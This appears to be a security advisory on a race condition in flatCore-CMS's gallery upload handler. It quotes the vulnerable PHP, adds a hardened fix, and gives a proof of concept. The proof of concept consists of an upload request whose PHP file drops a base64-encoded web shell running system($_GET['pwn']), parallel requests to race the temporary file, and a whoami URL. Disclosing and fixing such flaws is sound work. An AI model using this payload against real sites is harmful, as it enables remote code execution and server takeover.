Title: Race condition vs. temporary file upload
flatCore-CMS is vulnerable to a race condition when handling gallery uploads.
The relevant code is at https://github.com/flatCore/flatCore-CMS/blob/main/acp/core/files.upload_gallery.php#L31:
    if(array_key_exists('file',$_FILES) && $_FILES['file']['error'] == 0 ){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $timestring = microtime(true);
        $suffix = strrchr($_FILES["file"]["name"],"."); // keeps the client-supplied extension, e.g. ".php"
        $org_name = $timestring . $suffix;
        $img_name = $timestring."_img.jpg";
        $tmb_name = $timestring."_tmb.jpg";
        if(move_uploaded_file($tmp_name, "$uploads_dir/$org_name")) { // [1] our PHP file has been uploaded!
            create_thumbs($uploads_dir,$org_name,$img_name, $max_width,$max_height,90);
            create_thumbs($uploads_dir,$img_name,$tmb_name, $max_width_tmb,$max_height_tmb,80);
            unlink("$uploads_dir/$org_name"); // [2] but it is only unlinked after both thumbnails have been generated...
            print ('Uploaded');
        }
    }
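A hardened version of the handler above, added here as an example (it is not flatCore's own fix; it assumes $uploads_dir and the $max_* size limits from the original snippet and that the GD extension is loaded):

```php
<?php
// Added example, not flatCore's own code. Assumes $uploads_dir and the
// $max_* limits are defined as in the original handler, and ext-gd is loaded.
// The original is exploitable because the raw upload lands in the web-served
// gallery directory under a predictable microtime name with the client's
// extension, and is unlinked only after thumbnailing. Here the raw bytes never
// reach $uploads_dir: only GD-re-encoded JPEGs with a random name are written.

function handle_gallery_upload(array $file, string $uploads_dir,
                               int $max_width, int $max_height,
                               int $max_width_tmb, int $max_height_tmb): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return 'Upload failed';
    }
    // Validate by content, not by the client-supplied filename or extension.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !in_array($info[2], [IMAGETYPE_JPEG, IMAGETYPE_PNG, IMAGETYPE_GIF], true)) {
        return 'Rejected: not a supported image';
    }
    // Decode in memory; a PHP script with an image extension fails here.
    $src = @imagecreatefromstring(file_get_contents($file['tmp_name']));
    if ($src === false) {
        return 'Rejected: undecodable image';
    }
    $base = bin2hex(random_bytes(16)); // unpredictable, replaces microtime(true)
    $ok = write_scaled_jpeg($src, "$uploads_dir/{$base}_img.jpg", $max_width, $max_height, 90)
       && write_scaled_jpeg($src, "$uploads_dir/{$base}_tmb.jpg", $max_width_tmb, $max_height_tmb, 80);
    imagedestroy($src);
    return $ok ? 'Uploaded' : 'Upload failed';
}

// Scale $src to fit within $maxW x $maxH and write a fresh JPEG generated by GD,
// so none of the uploaded bytes are copied through to disk.
function write_scaled_jpeg($src, string $path, int $maxW, int $maxH, int $quality): bool
{
    $w = imagesx($src); $h = imagesy($src);
    $scale = min(1.0, $maxW / $w, $maxH / $h);
    $dst = imagecreatetruecolor(max(1, (int)($w * $scale)), max(1, (int)($h * $scale)));
    imagecopyresampled($dst, $src, 0, 0, 0, 0, imagesx($dst), imagesy($dst), $w, $h);
    $ok = imagejpeg($dst, $path, $quality);
    imagedestroy($dst);
    return $ok;
}

if (array_key_exists('file', $_FILES)) {
    print handle_gallery_upload($_FILES['file'], $uploads_dir,
                                $max_width, $max_height, $max_width_tmb, $max_height_tmb);
}
```

Because nothing but GD output is ever written under the web root, there is no window in which a request for a .php file in the gallery directory can succeed, regardless of how many parallel requests are sent.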
So this can be exploited automatically with parallel request tools such as Burp Suite Intruder.
First, the attacker sends a large number of upload requests like the following:
// #1 HTTP request
POST /acp/core/files.upload_gallery.php HTTP/1.1
Host: flatcore
Content-Length: 4361
Accept: application/json
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryN9xFk8EMA5iTZnL0
Origin: http://flatcore
Referer: http://flatcore/acp/acp.php?tn=filebrowser&sub=browse
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.
Cookie: acptheme=dark; identifier=EnNEM4kvqbEvutxAb2QVZTjL; securitytoken=49593ab95703dd857048f19695fd95c2d3535486; PHPSESSID=mjtavnv285s6moa6n2n26cf1iq
Connection: close
------WebKitFormBoundaryN9xFk8EMA5iTZnL0
Content-Disposition: form-data; name="csrf_token"
64da9729f086b0072f4888bc8ff12f42
------WebKitFormBoundaryN9xFk8EMA5iTZnL0
Content-Disposition: form-data; name="file"; filename="1337.php"
Content-Type: text/plain
<?php
file_put_contents("./shell.php", base64_decode("PD9waHAgcGhwaW5mbygpOyAKc3lzdGVtKCRfR0VUW3B3bl0pOwo/Pg=="));
?>
------WebKitFormBoundaryN9xFk8EMA5iTZnL0--
At the same time, the attacker must continuously request the temporary PHP file, as:
GET /content/galleries/2021/gallery350/[microtime].php HTTP/1.1
Host: flatcore
Here [microtime] stands for the value of microtime(true), i.e. a value like 1634147952.6662.
If the brute force succeeds, shell.php will appear at content\galleries\2021\gallery350\shell.php and can be reached at
http://[FlatCore]/content/galleries/2021/gallery350/shell.php?pwn=whoami
This vulnerability allows remote code execution with admin privileges.